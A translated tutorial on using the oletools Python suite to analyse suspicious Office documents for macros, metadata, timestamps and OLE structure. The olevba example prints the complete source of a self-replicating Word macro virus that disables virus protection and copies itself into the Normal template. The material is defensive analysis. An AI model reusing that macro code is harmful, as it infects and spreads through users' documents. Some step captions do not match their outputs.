preface
After learning oletools python, you can perform basic analysis on malicious document samples.
What is oletools Python
Oletools Python tool is used to analyze MS OLE2 files (structured storage, composite file binary format) and MS Office documents for malware analysis, forensics and debugging.
Download and install
- Linux,Mac: sudo -H pip install -U oletools
- Windows: pip install -U oletools
Official website link: https://pypi.org/project/oletools/
Tool module
Tools for Analyzing Malicious sample files
oleid: analysis OLE File to detect specific features commonly found in malicious files. olevba: from MS Office Documentation( OLE and OpenXML)Extraction and analysis in VBA Macro Source code. MacroRaptor: Detect malicious VBA macro msodde: Detect and from MS Office file, RTF and CSV Extract from DDE / DDEAUTO link pyxswf: Detection, extraction and analysis may be embedded in MS Office Document (e.g Word,Excel)and RTF Etc Flash Object( SWF),This is particularly useful for malware analysis. oleobj: from OLE Extract embedded objects from the file. rtfobj: from RTF Extract embedded objects from the file.
Tools for analyzing OLE file structure
olebrowse: A simple GUI,Browsable OLE File (e.g MS Word,Excel,Powerpoint Document) to view and extract a single data stream. olemeta: from OLE Extract all standard attributes (metadata) from the file. oletimes: Extract the creation and modification timestamps of all streams and stores. oledir: display OLE All directory entries for the file, including free and orphaned entries. olemap: display OLE Mapping of all sectors in the file.
Application examples
- Determine whether the sample contains suspicious macros (macro viruses)
python mraptor.py file.docx
Output content:
MacroRaptor 0.51 - http://decalage.info/python/oletools This is work in progress, please report issues at https://github.com/decalage2/oletools/issues ----------+-----+----+-------------------------------------------------------- Result |Flags|Type|File ----------+-----+----+-------------------------------------------------------- Macro OK |--- |TXT |log.docx Flags: A=AutoExec, W=Write, X=Execute Exit code: 2 - Macro OK
mraptor detects most malicious VBA macros through heuristic methods, which is different from anti-virus engine detection signature. When a document is found to automatically execute triggers and write to the file system or memory, or execute VBA context, it will be judged as a malicious macro.
- Get the creation and modification time of all streams and stores in the sample
python oletimes.py file.doc
Output content:
FILE: file.doc +----------------------------+---------------------+---------------+ | Stream/Storage name | Modification Time | Creation Time | +----------------------------+---------------------+---------------+ | Root | 2017-01-04 02:04:53 | None | | '\x01CompObj' | None | None | | '\x05DocumentSummaryInform | None | None | | ation' | | | | '\x05SummaryInformation' | None | None | | '1Table' | None | None | | 'Data' | None | None | | 'WordDocument' | None | None | +----------------------------+---------------------+---------------+
Obtaining the time information of files through ole times can help us sort out the creation order and association relationship of files in the process of processing a large number of document samples.
- View the basic information of flow structure in the document
python oledir.py file.doc
Output content:
OLE directory entries in file file.doc: ----+------+-------+----------------------+-----+-----+-----+--------+------ id |Status|Type |Name |Left |Right|Child|1st Sect|Size ----+------+-------+----------------------+-----+-----+-----+--------+------ 0 |<Used>|Root |Root Entry |- |- |3 |68 |128 1 |<Used>|Stream |Data |- |- |- |15 |4096 2 |<Used>|Stream |1Table |1 |6 |- |1D |27856 3 |<Used>|Stream |WordDocument |2 |5 |- |0 |10290 4 |<Used>|Stream |\x05SummaryInformation|- |- |- |54 |4096 5 |<Used>|Stream |\x05DocumentSummaryInf|4 |- |- |5C |4096 | | |ormation | | | | | 6 |<Used>|Stream |\x01CompObj |- |- |- |0 |110 7 |unused|Empty | |- |- |- |0 |0
- View the mapping of all OLE sectors in the document
python olemeta.py file.doc
Output content:
FILE: file.doc Properties from the SummaryInformation stream: +---------------------+------------------------------+ |Property |Value | +---------------------+------------------------------+ |codepage |936 | |title | | |subject | | |author |TIPDM | |keywords | | |template |Normal.dotm | |last_saved_by |User | |revision_number |6 | |total_edit_time |1740 | |last_printed |2016-06-27 05:49:00 | |create_time |2016-07-27 23:49:00 | |last_saved_time |2017-01-04 02:04:00 | |num_pages |1 | |num_words |87 | |num_chars |498 | |creating_application |Microsoft Office Word | |security |0 | +---------------------+------------------------------+ Properties from the DocumentSummaryInformation stream: +---------------------+------------------------------+ |Property |Value | +---------------------+------------------------------+ |codepage_doc |936 | |lines |4 | |paragraphs |1 | |scale_crop |False | |company | | |links_dirty |False | |chars_with_spaces |584 | |shared_doc |False | |hlinks_changed |False | |version |917504 | +---------------------+------------------------------
- Extract the macro code of the document
python olevba.py file.doc
Output content:
Flags Filename ----------- ----------------------------------------------------------------- OLE:MAS--B-- file.doc =============================================================================== FILE: file.doc Type: OLE ------------------------------------------------------------------------------- VBA MACRO ThisDocument.cls in file: file.doc - OLE stream: u'Macros/VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 'APMP 'KILL Private Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule With Host If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then .DeleteLines 1, .CountOfLines .InsertLines 1, MyCode If ThisDocument = NormalTemplate Then _ ActiveDocument.SaveAs ActiveDocument.FullName End If End With End Sub +------------+----------------+-----------------------------------------+ | Type | Keyword | Description | +------------+----------------+-----------------------------------------+ | AutoExec | Document_Open | Runs when the Word or Publisher | | | | document is opened | | Suspicious | KILL | May delete a file | | Suspicious | VBProject | May attempt to modify the VBA code | | | | (self-modification) | | Suspicious | VBComponents | May attempt to modify the VBA code | | | | (self-modification) | | Suspicious | CodeModule | May attempt to modify the VBA code | | | | (self-modification) | | Suspicious | Base64 Strings | Base64-encoded strings were detected, | | | | may be used to obfuscate strings | | | | (option --decode to see all) | +------------+----------------+-----------------------------------------+
olvba is a tool for parsing OLE and OpenXML files. It can detect whether VBA macros are suspicious by extracting source code, keywords used by anti sandbox and anti virtualization technology and potential IOC (IP address, URL, executable file name, etc.). It can also detect and decode several common confusion methods, including hexadecimal, inverted string, base64, dridex, VBA expression, and extract IOC from the decoded string.
- Detect specific characteristics of documents
python oleid.py file.doc
Output content:
Filename: file.doc +-------------------------------+-----------------------+ | Indicator | Value | +-------------------------------+-----------------------+ | OLE format | True | | Has SummaryInformation stream | True | | Application name | Microsoft Office Word | | Encrypted | False | | Word Document | True | | VBA Macros | False | | Excel Workbook | False | | PowerPoint Presentation | False | | Visio Drawing | False | | ObjectPool | False | | Flash objects | 0 | +-------------------------------+-----------------------+
OLE file types (such as MS Word, Excel, PowerPoint, etc.), VBA macros, embedded Flash objects, embedded macro objects, and MS Office encryption of malicious documents are detected through oleid.
summary
If you encounter suspicious document samples next time (such as document attachments in anonymous emails, group documents uploaded in QQ communication groups, resource documents shared by online disks, etc.), you can try to use the above methods for basic detection and analysis.